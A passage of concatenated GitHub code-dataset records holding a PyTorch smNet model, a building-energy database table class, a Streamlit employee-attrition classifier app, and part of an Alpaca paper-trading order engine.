__init__(self, iChannels, oChannels, stride):\n super(resBlock, self).__init__()\n\n n = oChannels\n self.residual = nn.Sequential(\n conv3x3(int(iChannels), int(n/4), 1), nn.BatchNorm2d(int(n/4), 1e-3), nn.PReLU(),\n conv3x3(int(n/4), int(n/2), stride), nn.BatchNorm2d(int(n/2), 1e-3), nn.PReLU(),\n conv3x3(int(n/2), int(n), 1), nn.BatchNorm2d(int(n), 1e-3)\n )\n if stride > 1 or iChannels != n:\n self.identity = nn.Sequential(conv1x1(iChannels, oChannels, stride), nn.BatchNorm2d(int(n), 1e-3))\n else:\n self.identity = 'Identity'\n self.prelu = nn.PReLU()\n\n def forward(self, x):\n out = self.residual(x)\n if self.identity == 'Identity':\n out += x\n else:\n out += self.identity(x)\n out = self.prelu(out)\n return out\n\nclass Net(nn.Module):\n def __init__(self, iChannels, output):\n super(Net, self).__init__()\n if opt.mode == 'xy' or 'z' or 'alpha' or 'beta':\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128,128,1), resBlock(128,128,1), resBlock(128,128,1),\n resBlock(128,256,1),\n resBlock(256,256,1), resBlock(256,256,1), resBlock(256,256,1),\n conv1x1(256, 128, 1), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n conv1x1(128, 64, 1), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n conv1x1(64, 1, 1), nn.BatchNorm2d(1, 1e-3), nn.PReLU()\n )\n self.FCs = nn.Sequential(\n nn.Linear(opt.imHeight * opt.imWidth, 10), nn.PReLU(),\n nn.Linear(10,int(output))\n )\n self.Hardtanh = nn.Hardtanh(-opt.crange, opt.crange)\n\n if opt.mode == 'aberration':\n if opt.labelsize <= 12:\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128, 128, 1), resBlock(128, 128, 1), resBlock(128, 128, 1),\n resBlock(128, 256, 4),\n resBlock(256, 256, 1), resBlock(256, 256, 1), resBlock(256, 256, 1),\n conv1x1(256, 128, 1), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n conv1x1(128, 64,1), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n conv1x1(64, 1, 1), nn.BatchNorm2d(1, 1e-3), nn.PReLU()\n )\n self.FCs = nn.Sequential(\n nn.Linear(int((opt.imHeight/4) * (opt.imWidth/4)), int(output))\n )\n else:\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128, 128, 1), resBlock(128, 128, 1), resBlock(128, 128, 1),\n resBlock(128, 256, 4),\n resBlock(256, 256, 1), resBlock(256, 256, 1), resBlock(256, 256, 1),\n resBlock(256, 1024, 4),\n resBlock(1024, 1024, 1), resBlock(1024, 1024, 1), resBlock(1024, 1024, 1),\n conv1x1(1024, int(output), 1)\n )\n\n def forward(self, x):\n x = self.features(x)\n if opt.labelsize > 12:\n x = x.view(-1, x.size(1))\n else:\n x = x.view(-1, x.size(2)*x.size(3))\n x = self.FCs(x)\n if opt.mode == 'xy' or 'z':\n x = self.Hardtanh(x)\n return x\n","repo_name":"HuanglabPurdue/smNet","sub_path":"smNet_Pytorch/smNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72624412072","text":"from building_energy_standards_data.database_engine.database import DBOperation\nfrom building_energy_standards_data.database_engine.database_util import (\n is_float,\n getattr_either,\n)\n\nRECORD_HELP = \"\"\"\nMust provide a tuple that contains:\ntemplate: TEXT\nnumber_of_poles: NUMERIC\ntype: TEXT\nsynchronous_speed: TEXT\nminimum_capacity: NUMERIC\nmaximum_capacity: NUMERIC\nnominal_full_load_efficiency: NUMERIC\nannotation: TEXT (optional)\n\"\"\"\n\nCREATE_HVAC_REQUIREMENT_MOTORS_TABLE = \"\"\"\nCREATE TABLE IF NOT EXISTS %s\n(id INTEGER PRIMARY KEY, \ntemplate TEXT NOT NULL, \nnumber_of_poles NUMERIC,\ntype TEXT NOT NULL,\nsynchronous_speed NUMERIC NOT NULL,\nminimum_capacity NUMERIC,\nmaximum_capacity NUMERIC NOT NULL,\nnominal_full_load_efficiency NUMERIC NOT NULL,\nannotation TEXT);\n\"\"\"\n\nINSERT_A_MOTOR_RECORD = \"\"\"\n INSERT INTO %s (\ntemplate, \nnumber_of_poles,\ntype,\nsynchronous_speed,\nminimum_capacity,\nmaximum_capacity,\nnominal_full_load_efficiency,\nannotation\n) \nVALUES (?, ?, ?, ? , ?, ?, ?, ?);\n\"\"\"\n\nRECORD_TEMPLATE = {\n \"template\": \"\",\n \"number_of_poles\": 0.0,\n \"type\": \"\",\n \"synchronous_speed\": 0.0,\n \"minimum_capacity\": 0.0,\n \"maximum_capacity\": 0.0,\n \"nominal_full_load_efficiency\": 0.0,\n \"annotation\": \"\",\n}\n\n\nclass HVACMinimumRequirementMotors(DBOperation):\n def __init__(self, table_name, initial_data_directory):\n super(HVACMinimumRequirementMotors, self).__init__(\n table_name=table_name,\n record_template=RECORD_TEMPLATE,\n initial_data_directory=initial_data_directory,\n create_table_query=CREATE_HVAC_REQUIREMENT_MOTORS_TABLE % table_name,\n insert_record_query=INSERT_A_MOTOR_RECORD % table_name,\n )\n\n def get_record_info(self):\n \"\"\"\n A function to return the record info of the table\n :return:\n \"\"\"\n return RECORD_HELP\n\n def validate_record_datatype(self, record):\n str_expected = [\n \"template\",\n \"type\",\n ]\n\n for f in str_expected:\n if record.get(f):\n assert isinstance(\n record[f], str\n ), f\"{f} requires to be a string, instead got {record[f]}\"\n\n float_expected = [\n \"number_of_poles\",\n \"synchronous_speed\",\n \"minimum_capacity\",\n \"maximum_capacity\",\n \"nominal_full_load_efficiency\",\n ]\n\n for f in float_expected:\n if record.get(f):\n assert is_float(\n record.get(f)\n ), f\"{f} requires to be numeric data type, instead got {record[f]}\"\n return True\n\n def _preprocess_record(self, record):\n \"\"\"\n\n :param record: dict\n :return:\n \"\"\"\n\n return (\n getattr_either(\"template\", record),\n getattr_either(\"number_of_poles\", record),\n getattr_either(\"type\", record),\n getattr_either(\"synchronous_speed\", record),\n getattr_either(\"minimum_capacity\", record),\n getattr_either(\"maximum_capacity\", record),\n getattr_either(\"nominal_full_load_efficiency\", record),\n getattr_either(\"annotation\", record),\n )\n","repo_name":"pnnl/building-energy-standards-data","sub_path":"building_energy_standards_data/database_tables/hvac_minimum_requirement_motors.py","file_name":"hvac_minimum_requirement_motors.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13328082944","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import (accuracy_score, log_loss, classification_report)\nfrom imblearn.over_sampling import SMOTE\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\nimport SessionState\n\n'''\n# Retenção de Funcionários\n\nEste conjunto de dados foi disponibilizado pela IBM e pode ser acessado neste [link](https://www.kaggle.com/pavansubhasht/ibm-hr-analytics-attrition-dataset) do Kaggle.\n\nO desenvolvimento do modelo e análise de features tem como referência este [notebook](https://www.kaggle.com/arthurtok/employee-attrition-via-ensemble-tree-based-methods) disponível também no Kaggle.\n\nOs dados são fictícios.\n\nOs campos de avaliação seguem estas definições:\n'''\n\ncol1, col2 = st.beta_columns(2)\n\nwith col1:\n '''\n Education\n\n * 1 Below College\n * 2 College\n * 3 Bachelor\n * 4 Master\n * 5 Doctor\n\n EnvironmentSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n JobInvolvement\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n JobSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n '''\n\nwith col2:\n '''\n PerformanceRating\n\n * 1 Low\n * 2 Good\n * 3 Excellent\n * 4 Outstanding\n\n RelationshipSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n WorkLifeBalance\n\n * 1 Bad\n * 2 Good\n * 3 Better\n * 4 Best\n '''\n\n'''\n## Conjunto de Dados\n\n'''\n\nattrition = pd.read_csv('data/WA_Fn-UseC_-HR-Employee-Attrition.csv')\n\nattrition = attrition.drop(['EmployeeCount'], axis=1)\nattrition = attrition.drop(['EmployeeNumber'], axis=1)\nattrition = attrition.drop(['StandardHours'], axis=1)\nattrition = attrition.drop(['Over18'], axis=1)\n\nattrition\n\n\n'''\n## Análise Exploratória Rápida\n\n\n'''\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"Age\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"TotalWorkingYears\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"Age\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"YearsInCurrentRole\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"YearsAtCompany\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"JobSatisfaction\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"WorkLifeBalance\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"JobSatisfaction\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\n# Define a dictionary for the target mapping\ntarget_map = {'Yes': 1, 'No': 0}\n# Use the pandas apply method to numerically encode our attrition target variable\nattrition[\"Attrition_numerical\"] = attrition[\"Attrition\"].apply(\n lambda x: target_map[x])\n\n# creating a list of only numerical values\nnumerical = [u'Age', u'DailyRate', u'DistanceFromHome',\n u'Education', u'EnvironmentSatisfaction',\n u'HourlyRate', u'JobInvolvement', u'JobLevel', u'JobSatisfaction',\n u'MonthlyIncome', u'MonthlyRate', u'NumCompaniesWorked',\n u'PercentSalaryHike', u'PerformanceRating', u'RelationshipSatisfaction',\n u'StockOptionLevel', u'TotalWorkingYears',\n u'TrainingTimesLastYear', u'WorkLifeBalance', u'YearsAtCompany',\n u'YearsInCurrentRole', u'YearsSinceLastPromotion', u'YearsWithCurrManager']\n\nplt.figure(figsize=(19, 15))\n\ncorrMatrix = attrition[numerical].corr()\n\n'''\n## Matriz de Correlação\n\n\nSuporta a decisão de escolhas de atributos para serem utilizados no treinamento. Quanto mais correlação houver, melhor será para o modelo, o inverso também ocorre, pois ao abrir mão de atributos que não contribuem para o aprendizado para o modelo, ele ficará mais preciso e mais leve.\n\n'''\n\nst.set_option('deprecation.showPyplotGlobalUse', False)\nsns.heatmap(corrMatrix)\n# Use Matplotlib to render seaborn\nst.pyplot()\n\n'## Atributos Utilizados no Treinamento '\n\n# Drop the Attrition_numerical column from attrition dataset first - Don't want to include that\nattrition = attrition.drop(['Attrition_numerical'], axis=1)\n\n# Empty list to store columns with categorical data\ncategorical = []\nfor col, value in attrition.iteritems():\n if value.dtype == 'object':\n categorical.append(col)\n\n# Store the numerical columns in a list numerical\nnumerical = attrition.columns.difference(categorical)\ncategorical.remove('Attrition')\n\natributes_numerical = st.multiselect(\n 'Atributos Numéricos Selecionados', numerical.values.tolist(), numerical.values.tolist())\natributes_categorical = st.multiselect(\n 'Atributos Categóricos Selecionados', categorical, categorical)\n\n# Store the categorical data in a dataframe called attrition_cat\nattrition_cat = attrition[atributes_categorical]\nattrition_cat = pd.get_dummies(attrition_cat)\n\n# Store the numerical features to a dataframe attrition_num\nattrition_num = attrition[atributes_numerical]\n\n# Concat the two dataframes together columnwise\nattrition_final = pd.concat([attrition_num, attrition_cat], axis=1)\n\n# Define a dictionary for the target mapping\ntarget_map = {'Yes': 1, 'No': 0}\n# Use the pandas apply method to numerically encode our attrition target variable\ntarget = attrition[\"Attrition\"].apply(lambda x: target_map[x])\n\nsession_state = SessionState.get(trained=False, train=None)\n\nseed = 1 # We set our random seed to zero for reproducibility\n# Random Forest parameters\nrf_params = {\n 'n_jobs': -1,\n 'n_estimators': 1000,\n 'max_features': 0.3,\n 'max_depth': 4,\n 'min_samples_leaf': 2,\n 'max_features': 'sqrt',\n 'random_state': seed,\n 'verbose': 0\n}\n\nrf = RandomForestClassifier(**rf_params)\n\n# Split data into train and test sets as well as for validation and testing\ntrain, test, target_train, target_val = train_test_split(attrition_final,\n target,\n train_size=0.80,\n random_state=1)\noversampler = SMOTE(random_state=0)\nsmote_train, smote_target = oversampler.fit_sample(train, target_train)\n\nif st.button('Treinar Modelo') or session_state.trained:\n 'Iniciando o treinamento...'\n\n rf.fit(smote_train, smote_target)\n\n session_state.model = rf\n session_state.trained = True\n\n 'Treinamento terminado.'\n 'Verificando predições...'\n\n rf_predictions = rf.predict(test)\n\n st.success('Modelo treinado e valido com sucesso!')\n score = \"Pontuação de Precisão (Accurácia): {}\".format(\n accuracy_score(target_val, rf_predictions))\n session_state.score = score\n\n st.info(score)\n\n plt.figure(figsize=(19, 15))\n (pd.Series(rf.feature_importances_, index=attrition_final.columns.values)\n .nlargest(20)\n .plot(kind='barh'))\n st.pyplot()\n\n test_value = [20, 2000, 10, 5, 2, 94, 3, 4, 4, 5993, 19479, 8, 11, 3, 1, 0, 8, 0, 1, 6, 4,\n 0, 5, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1]\n\n '## Teste de Inferência Unitária'\n 'Supondo um determinado profissional, varie os valores que foram utilizados no treinamento e compare com os resultados ao final, incluindo sua probabilidade.'\n\n col2_1, col2_2, col2_3 = st.beta_columns(3)\n\n with col2_1:\n s_business_travel = st.selectbox(\n \"Business Travel\", attrition[\"BusinessTravel\"].unique())\n\n if s_business_travel == 'Non_Travel':\n test_value[23] = 1\n test_value[24] = 0\n test_value[25] = 0\n elif s_business_travel == 'Travel_Frequently':\n test_value[23] = 0\n test_value[24] = 1\n test_value[25] = 0\n else:\n test_value[23] = 0\n test_value[24] = 0\n test_value[25] = 1\n\n s_department = st.selectbox(\n \"Department\", attrition[\"Department\"].unique())\n\n if s_department == 'Human Resources':\n test_value[26] = 1\n test_value[27] = 0\n test_value[28] = 0\n elif s_business_travel == 'Research & Development':\n test_value[26] = 0\n test_value[27] = 1\n test_value[28] = 0\n else:\n test_value[26] = 0\n test_value[27] = 0\n test_value[28] = 1\n\n s_education_field = st.selectbox(\n \"Education Field\", attrition[\"EducationField\"].unique())\n\n if s_education_field == 'Human Resources':\n test_value[29] = 1\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Life Sciences':\n test_value[29] = 0\n test_value[30] = 1\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Marketing':\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 1\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Medical':\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 1\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Other':\n test_value[29] = 1\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 1\n test_value[34] = 0\n else:\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 1\n\n with col2_2:\n s_gender = st.selectbox(\"Gender\", attrition[\"Gender\"].unique())\n\n if s_gender == 'Human Resources':\n test_value[35] = 1\n test_value[36] = 0\n else:\n test_value[35] = 0\n test_value[36] = 1\n\n s_job_role = st.selectbox(\"Job Role\", attrition[\"JobRole\"].unique())\n\n if s_job_role == 'Healthcare Representative':\n test_value[37] = 1\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Human Resources':\n test_value[37] = 0\n test_value[38] = 1\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Laboratory Technician':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 1\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Manager':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 1\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Manufacturing Director':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 1\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Research Director':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 1\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Research Scientist':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 1\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Sales Executive':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 1\n test_value[45] = 0\n else:\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 1\n\n s_marital_status = st.selectbox(\n \"Marital Status\", attrition[\"MaritalStatus\"].unique())\n\n if s_marital_status == 'Divorced':\n test_value[46] = 1\n test_value[47] = 0\n test_value[48] = 0\n elif s_business_travel == 'Married ':\n test_value[46] = 0\n test_value[47] = 1\n test_value[48] = 0\n else:\n test_value[46] = 0\n test_value[47] = 0\n test_value[48] = 1\n\n with col2_3:\n\n s_over_time = st.selectbox(\"Over Time\", attrition[\"OverTime\"].unique())\n\n if s_over_time == 'No':\n test_value[49] = 1\n test_value[50] = 0\n else:\n test_value[49] = 0\n test_value[50] = 1\n\n col3_1, col3_2 = st.beta_columns(2)\n\n with col3_1:\n n_age = st.slider(\"Age\", int(attrition[\"Age\"].min()), int(\n 2*attrition[\"Age\"].max()), test_value[0])\n test_value[0] = n_age\n\n n_daily_rate = st.slider(\"Daily Rate\", int(attrition[\"DailyRate\"].min()), int(\n 2*attrition[\"DailyRate\"].max()), test_value[1])\n test_value[1] = n_daily_rate\n\n n_dist_home = st.slider(\"Distance from Home\", int(attrition[\"DistanceFromHome\"].min(\n )), int(2*attrition[\"DistanceFromHome\"].max()), test_value[2])\n test_value[2] = n_dist_home\n\n n_education = st.slider(\"Education\", int(attrition[\"Education\"].min()), int(\n 2*attrition[\"Education\"].max()), test_value[3])\n test_value[3] = n_education\n\n n_env_satisf = st.slider(\"Environment Satisfaction\", int(attrition[\"EnvironmentSatisfaction\"].min(\n )), int(attrition[\"EnvironmentSatisfaction\"].max()), test_value[4])\n test_value[4] = n_env_satisf\n\n n_hour_rate = st.slider(\"Hourly Rate\", int(attrition[\"HourlyRate\"].min()), int(\n 2*attrition[\"HourlyRate\"].max()), test_value[5])\n test_value[5] = n_hour_rate\n\n n_job_involv = st.slider(\"Job Involvement\", int(attrition[\"JobInvolvement\"].min(\n )), int(attrition[\"JobInvolvement\"].max()), test_value[6])\n test_value[6] = n_job_involv\n\n n_job_level = st.slider(\"Job Level\", int(attrition[\"JobLevel\"].min()), int(\n attrition[\"JobLevel\"].max()), test_value[7])\n test_value[7] = n_job_level\n\n n_job_satisf = st.slider(\"Job Satisfaction\", int(attrition[\"JobSatisfaction\"].min(\n )), int(attrition[\"JobSatisfaction\"].max()), test_value[8])\n test_value[8] = n_job_satisf\n\n n_month_income = st.slider(\"Monthly Income\", int(attrition[\"MonthlyIncome\"].min(\n )), int(2*attrition[\"MonthlyIncome\"].max()), test_value[9])\n test_value[9] = n_month_income\n\n n_monthy_rate = st.slider(\"Monthly Rate\", int(attrition[\"MonthlyRate\"].min()), int(\n 2*attrition[\"MonthlyRate\"].max()), test_value[10])\n test_value[10] = n_monthy_rate\n\n num_comp_work = st.slider(\"Num. Companies Worked\", int(\n 2*attrition[\"NumCompaniesWorked\"].min()), int(attrition[\"NumCompaniesWorked\"].max()), test_value[11])\n test_value[11] = num_comp_work\n\n with col3_2:\n\n sal_hike = st.slider(\"% Salary Hike\", int(\n attrition[\"PercentSalaryHike\"].min()), int(2*attrition[\"PercentSalaryHike\"].max()), test_value[12])\n test_value[12] = sal_hike\n\n n_perf_rating = st.slider(\"Performance Rating\", int(attrition[\"PerformanceRating\"].min(\n )), int(attrition[\"PerformanceRating\"].max()), test_value[13])\n test_value[13] = n_perf_rating\n\n n_relat_satisf = st.slider(\"Relationship Satisfaction\", int(attrition[\"RelationshipSatisfaction\"].min(\n )), int(attrition[\"RelationshipSatisfaction\"].max()), test_value[15])\n test_value[14] = n_relat_satisf\n\n n_stock_op = st.slider(\"Stock Option Level\", int(\n attrition[\"StockOptionLevel\"].min()), int(attrition[\"StockOptionLevel\"].max()), test_value[15])\n test_value[15] = n_stock_op\n\n n_total_work_year = st.slider(\"Total Working Years\", int(\n 2*attrition[\"TotalWorkingYears\"].min()), int(attrition[\"TotalWorkingYears\"].max()), test_value[16])\n test_value[16] = n_total_work_year\n\n n_train_last_y = st.slider(\"Training Times Last Year\", int(\n 2*attrition[\"TrainingTimesLastYear\"].min()), int(attrition[\"TrainingTimesLastYear\"].max()), test_value[17])\n test_value[17] = n_train_last_y\n\n n_worklife_bal = st.slider(\"Work Life Balance\", int(\n attrition[\"WorkLifeBalance\"].min()), int(attrition[\"WorkLifeBalance\"].max()), test_value[18])\n test_value[18] = n_worklife_bal\n\n n_years_comp = st.slider(\"Years at Company\", int(attrition[\"YearsAtCompany\"].min(\n )), int(2*attrition[\"YearsAtCompany\"].max()), test_value[19])\n test_value[19] = n_years_comp\n\n n_years_role = st.slider(\"Years in Current Role\", int(attrition[\"YearsInCurrentRole\"].min(\n )), int(2*attrition[\"YearsInCurrentRole\"].max()), test_value[20])\n test_value[20] = n_years_role\n\n n_years_promo = st.slider(\"Years since Last Promotion\", int(attrition[\"YearsSinceLastPromotion\"].min(\n )), int(2*attrition[\"YearsSinceLastPromotion\"].max()), test_value[21])\n test_value[21] = n_years_promo\n\n n_years_manager = st.slider(\"Years with Current Manager\", int(\n attrition[\"YearsWithCurrManager\"].min()), int(2*attrition[\"YearsWithCurrManager\"].max()), test_value[22])\n test_value[22] = n_years_manager\n\n test_value = [test_value]\n\n try:\n\n prediction_id = rf.predict(test_value)[0]\n proba = int(100*rf.predict_proba(test_value)[0][prediction_id])\n\n if rf.predict(test_value)[0] == 1:\n st.warning(\"Attrition (\" + str(proba) + \"%)\")\n else:\n st.success(\"No Attrition (\" + str(proba) + \"%)\")\n st.balloons()\n\n st.progress(proba)\n\n except Exception as e:\n st.warning(e)\n","repo_name":"EYLatamSouth/ta-employee-attrition","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":20845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12222576515","text":"import requests, json\nfrom config import *\nimport alpaca_trade_api as tradeapi\nimport time\nimport pandas as pd\nimport datetime\n# for more documentation you can check https://algotrading101.com/learn/alpaca-trading-api-guide/\n\nclass OrderEngine(object):\n\n def __init__(self, price, symbol, side):\n self.price = price\n self.symbol = symbol\n self.side = side\n BASE_URL = \"https://paper-api.alpaca.markets\"\n self.ACCOUNT_URL = \"{}/v2/account\".format(BASE_URL)\n self.ORDERS_URL = \"{}/v2/orders\".format(BASE_URL)\n self.HEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n self.api = tradeapi.REST(API_KEY, SECRET_KEY, BASE_URL, api_version='v2')\n self.account = self.api.get_account()\n self.balance = self.account.cash \n self.conn = tradeapi.stream2.StreamConn(API_KEY, SECRET_KEY, BASE_URL)\n self.positions_list = self.api.list_positions()\n self.portfolio_history = self.initinalise_portfolio_history()\n self.qty = self.KELLY_CRITERION()\n \n\n def initinalise_portfolio_history(self):\n todays_date = datetime.date.today()\n \n day = int(todays_date.strftime('%d'))\n if day < 10:\n day = int(todays_date.strftime('%d')[1]) \n day = '0' + str(day)\n\n month = int(todays_date.strftime('%m'))\n if month < 10:\n month = str(todays_date.strftime('%m'))\n\n try:\n portfolio_history = self.api.get_portfolio_history(\n date_end='2021-{}-{}'.format(month,day),\n period='1D',\n timeframe='5Min'\n )\n print('2021-{}-{}'.format(month,day))\n except requests.exceptions.ConnectionError as err: \n print(err)\n portfolio_history = ''\n return portfolio_history\n\n def initialise_universe(self):\n #cancel all orders before end of the day\n self.api.close_all_positions()\n # a bunch of other api calls that can be useful\n self.api.cancel_all_orders()\n #create a random watchlist\n universe = self.api.create_watchlist()\n print(self.account)\n print(self.balance) \n print(universe)\n return universe\n # if you want to know the leverage\n #print(api.get_account_configurations())\n\n def initialise_alpaca_universe(self):\n assets = self.api.list_assets()\n assets_list = []\n for asset in assets:\n assets_list.append(asset.symbol)\n df = pd.DataFrame(assets_list)\n df.to_csv('Alpace tradable assets.csv')\n\n def update_probability_w(self):\n trade_won = 0\n day_trade_count = self.account.daytrade_count\n # you can access portfolio history from the database\n\n for p_and_l in self.portfolio_history.profit_loss:\n try:\n if p_and_l > 0:\n trade_won += 1\n else:\n pass\n except TypeError:\n pass\n p_w = trade_won/day_trade_count\n return p_w\n\n # kelly criterion assumes that returns are stationary\n def KELLY_CRITERION(self):\n try:\n p_w = self.update_probability_w()\n except ZeroDivisionError:\n p_w = 0.5\n p_l = 1 - p_w\n lot_size = (2*p_w - p_l)/2\n try:\n qty = (lot_size*float(self.balance))/self.price\n qty = round(qty)\n except ZeroDivisionError:\n qty = 0\n except ValueError:\n qty = 1\n except OverflowError:\n qty = 1\n #UHEWRBVIUWBVQIUVBQPOIUVQOIUBVQIUBQIUBVOIUEQRBNQIUBVNOIUQBVLQI\n qty = 1\n return qty\n\n def get_account(self):\n r = requests.get(self.ACCOUNT_URL, headers=self.HEADERS)\n\n return json.loads(r.content)\n\n def create_order(self,qty=0, time_in_force='gtc'):\n if qty == 0:\n pass\n else:\n self.qty = qty\n types = 'market'\n if self.side == 'buy':\n order = self.api.submit_order(\n self.symbol,\n self.qty,\n self.side, \n types,\n time_in_force, \n order_class='bracket',\n stop_loss={'stop_price': 0.995*self.price}, \n take_profit={'limit_price': 1.01*self.price}\n )\n elif self.side == 'sell':\n order = self.api.submit_order(\n self.symbol,\n self.qty,\n self.side, \n types,\n time_in_force, \n order_class='bracket',\n stop_loss={'stop_price': 1.005*self.price}, \n take_profit={'limit_price': 0.99*self.price}\n )\n else:\n print('what is the side')\n print(order)\n time.sleep(1)\n\n def get_orders(self):\n r = requests.get(self.ORDERS_URL, headers=self.HEADERS)\n\n return json.loads(r.content)\n\n # Submit a trailing stop order to sell 1 share of Apple at a\n # trailing stop of\n def create_trailing_sl_order(self, get_order=False):\n order = self.api.submit_order(\n symbol=self.symbol,\n qty=self.qty,\n side=self.side,\n type='trailing_stop',\n trail_percent=0.4, # stop price will be hwm*0.996\n time_in_force='gtc',\n )\n if get_order:\n return 